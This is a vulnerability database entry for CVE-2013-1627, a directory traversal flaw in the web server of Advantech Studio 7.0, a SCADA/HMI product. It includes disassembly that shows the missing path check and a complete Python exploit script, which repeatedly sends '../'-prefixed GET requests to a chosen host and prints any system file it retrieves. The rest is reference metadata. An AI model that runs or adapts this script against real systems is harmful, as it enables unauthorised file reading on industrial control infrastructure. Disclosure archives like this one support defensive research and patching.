ID
VAR-E-201212-0521
CVE
| cve_id: | CVE-2013-1627 | Trust: 1.9 |
EDB ID
23132
TITLE
Advantech Studio 7.0 - SCADA/HMI Directory Traversal - Windows webapps Exploit
Trust: 0.6
DESCRIPTION
Advantech Studio 7.0 - SCADA/HMI Directory Traversal. CVE-88925CVE-2013-1627 . webapps exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | advantech | model: | studio | scope: | eq | version: | 7.0 | Trust: 1.9 |
| vendor: | indusoft | model: | web studio | scope: | eq | version: | 7.0 | Trust: 0.3 |
EXPLOIT
# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A
'''
Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe,
the web server is a standalone executable that is used along side every project'
to serve as a web based management system with the help of an activex.
The flaw occurs because of a lack of any check on the path of the file requested. in
function sub_401A90:
.text:00402A4A push 0 ; dwFlagsAndAttributes
.text:00402A4C push 3 ; dwCreationDisposition
.text:00402A4E push 3 ; dwShareMode
.text:00402A50 push 80000000h ; dwDesiredAccess
.text:00402A55 mov edx, [ebp+lpFileName]
.text:00402A58 push edx ; lpFileName
.text:00402A59 lea ecx, [ebp+var_1C]
.text:00402A5C call sub_401A90
sub_401A90 use CreateFileW function directly.
.text:00401A97 push 0 ; hTemplateFile
.text:00401A99 mov eax, [ebp+dwFlagsAndAttributes]
.text:00401A9C push eax ; dwFlagsAndAttributes
.text:00401A9D mov ecx, [ebp+dwCreationDisposition]
.text:00401AA0 push ecx ; dwCreationDisposition
.text:00401AA1 push 0 ; lpSecurityAttributes
.text:00401AA3 mov edx, [ebp+dwShareMode]
.text:00401AA6 push edx ; dwShareMode
.text:00401AA7 mov eax, [ebp+dwDesiredAccess]
.text:00401AAA push eax ; dwDesiredAccess
.text:00401AAB mov ecx, [ebp+lpFileName]
.text:00401AAE push ecx ; lpFileName
.text:00401AAF call ds:CreateFileW
'''
import argparse
import httplib
MAX_NESTED_DIRECTORY = 32
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-d')
parser.add_argument('-p')
parser.add_argument('-f')
args = parser.parse_args()
if args.d == None or args.p == None or args.f == None:
print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini"
return
httpConn = httplib.HTTPConnection(args.d, int(args.p))
for i in xrange(0, MAX_NESTED_DIRECTORY):
temp = MakePath(args.f, i)
httpConn.request('GET', temp)
resp = httpConn.getresponse()
content = resp.read()
if resp.status == 404:
print 'Not found ' + temp
else:
print 'Found ' + temp
print'------------------------------------------'
print content
print'---------------------------------------EOF'
break
def MakePath(f, count):
a = ""
for i in xrange(0, count):
a = a + "../"
return a + f
if __name__ == "__main__":
main()
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
SCADA/HMI Directory Traversal
Trust: 1.0
CREDITS
Nin3
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-1627 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 23132 | Trust: 1.6 |
| db: | EDBNET | id: | 45292 | Trust: 0.6 |
| db: | ICS CERT ALERT | id: | ICS-ALERT-13-004-01 | Trust: 0.3 |
| db: | ICS CERT | id: | ICSA-13-067-01 | Trust: 0.3 |
| db: | BID | id: | 56871 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-1627 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/23132/ | Trust: 0.6 |
| url: | http://www.advantech.com/products/advantech-studio/mod_3d1b45b0-b0af-405c-a9cc-a27b35774634.aspx | Trust: 0.3 |
| url: | http://ics-cert.us-cert.gov/pdf/icsa-13-067-01.pdf | Trust: 0.3 |
| url: | http://www.indusoft.com/indusoftart.php?catid=1&name=iws/webstudio | Trust: 0.3 |
| url: | http://www.us-cert.gov/control_systems/pdf/ics-alert-13-004-01.pdf | Trust: 0.3 |
SOURCES
| db: | BID | id: | 56871 |
| db: | EXPLOIT-DB | id: | 23132 |
| db: | EDBNET | id: | 45292 |
LAST UPDATE DATE
2022-07-27T09:54:28.336000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 56871 | date: | 2013-03-08T18:24:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 56871 | date: | 2012-12-04T00:00:00 |
| db: | EXPLOIT-DB | id: | 23132 | date: | 2012-12-04T00:00:00 |
| db: | EDBNET | id: | 45292 | date: | 2012-12-04T00:00:00 |